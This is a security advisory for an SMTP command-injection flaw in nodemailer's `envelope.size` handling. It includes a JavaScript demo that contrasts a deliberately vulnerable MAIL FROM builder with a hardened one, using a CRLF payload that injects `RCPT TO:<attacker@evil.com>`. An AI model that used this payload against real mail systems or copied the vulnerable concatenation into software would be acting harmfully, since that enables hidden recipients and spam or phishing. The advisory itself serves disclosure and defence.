GHSA-c7w3-x93f-qmm8
SMTP Command Injection vulnerability in nodemailer (npm)

Type: SMTP Command Injection. Known public exploit: none.

What is GHSA-c7w3-x93f-qmm8 About?

This vulnerability allows SMTP command injection in Nodemailer when a custom `envelope` object whose `size` property contains CRLF characters is passed to `sendMail()`. The value is concatenated directly into the SMTP `MAIL FROM` command, so an attacker who controls it can inject arbitrary SMTP commands. Exploitation relies on the application explicitly using a custom envelope object and accepting user-controlled input for the `size` property.

Affected Software

nodemailer <8.0.4

Technical Details

The vulnerability exists in lib/smtp-connection/index.js, where the `envelope.size` value is appended to the SMTP `MAIL FROM` command without being sanitized for CRLF characters. Specifically, when `this._envelope.size` is present and the server advertises the SIZE extension, `args.push('SIZE=' + this._envelope.size)` concatenates the value verbatim. If an attacker can control `envelope.size` and include `\r\n` (CRLF), they can terminate the `MAIL FROM` command prematurely and inject subsequent SMTP commands. For instance, a `size` of `100\r\nRCPT TO:<attacker@evil.com>` results in `MAIL FROM:<sender@example.com> SIZE=100` being sent, immediately followed by `RCPT TO:<attacker@evil.com>`, effectively adding a hidden recipient. While the other envelope parameters are sanitized, `size` is copied verbatim from the custom envelope and is therefore vulnerable.
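The following is an added example and is not nodemailer's own code. It models the `MAIL FROM` construction described above (a vulnerable builder that appends `envelope.size` verbatim, as the affected versions do) next to a hardened builder that only accepts a non-negative integer, and it splits the resulting bytes into the command lines a server would see, which is the check to run when an application passes user-controlled input into `envelope.size` as the Exploitability section warns. The function names, the envelope shape and the attacker-controlled sample value are assumptions made for illustration.

```javascript
// Added example, not nodemailer's own code. Models the MAIL FROM construction
// the advisory describes and a hardened alternative. All names and the sample
// input below are assumptions for illustration.

const CRLF = '\r\n';

// Vulnerable builder: mirrors the affected behaviour, where envelope.size is
// concatenated verbatim when the server advertises SIZE. Deliberately kept
// flawed to show the injection.
function buildMailFromVulnerable(envelope, serverSupportsSize) {
  const args = [];
  if (envelope.size && serverSupportsSize) {
    args.push('SIZE=' + envelope.size);
  }
  const extra = args.length ? ' ' + args.join(' ') : '';
  return 'MAIL FROM:<' + envelope.from + '>' + extra + CRLF;
}

// Hardened builder: SIZE must be a string of decimal digits that is a safe
// integer; anything else, including a value carrying CRLF, is rejected before
// it can reach the wire. (envelope.from is assumed already sanitized, as the
// advisory says the other envelope fields are.)
function buildMailFromHardened(envelope, serverSupportsSize) {
  const args = [];
  if (envelope.size !== undefined && envelope.size !== null && serverSupportsSize) {
    const text = String(envelope.size);
    if (!/^\d+$/.test(text) || !Number.isSafeInteger(Number(text))) {
      throw new Error('envelope.size must be a non-negative integer');
    }
    args.push('SIZE=' + Number(text));
  }
  const extra = args.length ? ' ' + args.join(' ') : '';
  return 'MAIL FROM:<' + envelope.from + '>' + extra + CRLF;
}

// Splits what the server would receive into individual command lines. Any
// outgoing MAIL FROM that yields more than one line has been injected into.
function smtpCommands(wire) {
  return wire.split(CRLF).filter((line) => line.length > 0);
}

// Constructed attacker-controlled value: a plausible size followed by CRLF and
// an injected RCPT TO, as in the advisory's example.
const INJECTED_SIZE = '100' + CRLF + 'RCPT TO:<attacker@evil.com>';

// Runs the vulnerable and hardened builders on the same envelope and returns
// what each produced so the difference can be inspected or asserted on.
function demo() {
  const envelope = {
    from: 'sender@example.com',
    to: ['victim@example.com'],
    size: INJECTED_SIZE,
  };
  const vulnerableWire = buildMailFromVulnerable(envelope, true);
  let hardenedError = null;
  try {
    buildMailFromHardened(envelope, true);
  } catch (err) {
    hardenedError = err.message;
  }
  return {
    vulnerableCommands: smtpCommands(vulnerableWire),
    hardenedError,
    hardenedSafe: buildMailFromHardened({ from: 'sender@example.com', size: 100 }, true),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

With the injected value the vulnerable builder emits two command lines, `MAIL FROM:<sender@example.com> SIZE=100` and `RCPT TO:<attacker@evil.com>`, while the hardened builder refuses the value and still emits a normal `SIZE=100` for an honest integer. The same `smtpCommands` split can be applied to captured client traffic as a regression check.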

What is the Impact of GHSA-c7w3-x93f-qmm8?

Successful exploitation may allow attackers to silently add hidden recipients to emails, inject arbitrary SMTP commands (e.g., additional `MAIL FROM`), and leverage the sending organization's SMTP server reputation for spam or phishing campaigns.

What is the Exploitability of GHSA-c7w3-x93f-qmm8?

Exploitation requires the application to explicitly define a custom envelope object with a size property and pass user-controlled input into this size field. The complexity is moderate, as it requires knowledge of SMTP protocols and the specific Nodemailer API usage. No authentication is required if the application exposes this functionality to unauthenticated users. The attack is remote, as it involves crafting input to a web application. Constraints include the need for the SIZE SMTP extension to be supported by the mail server and for the application to use custom envelope objects, which is not Nodemailer's default behavior. The risk increases for applications that expose envelope configuration to users via APIs or administrative interfaces.

What are the Known Public Exploits?

No known public exploits (no PoC, author, link or commentary listed).

What are the Available Fixes for GHSA-c7w3-x93f-qmm8?

Available Upgrade Options

  • nodemailer
    • <8.0.4 → Upgrade to 8.0.4


Additional Resources

What are Similar Vulnerabilities to GHSA-c7w3-x93f-qmm8?

Similar Vulnerabilities: CVE-2023-28434, CVE-2020-15507, CVE-2018-1000100, CVE-2017-1000499, CVE-2019-14867